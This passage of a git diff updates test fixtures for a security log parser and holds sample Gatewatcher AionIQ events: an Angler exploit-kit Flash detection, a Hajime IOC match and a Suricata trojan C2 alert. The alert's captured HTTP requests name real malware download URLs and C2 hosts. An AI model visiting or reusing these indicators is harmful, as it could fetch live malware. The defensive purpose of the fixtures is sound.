Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 
14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index d42b439ac..fd29bcfa4 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 
trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first 
tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a 
trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}" + } }, "expected": { "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit 
LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index bbbc667e0..0d72ba216 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, 
*/*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was 
detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,
\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YX
RpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: 
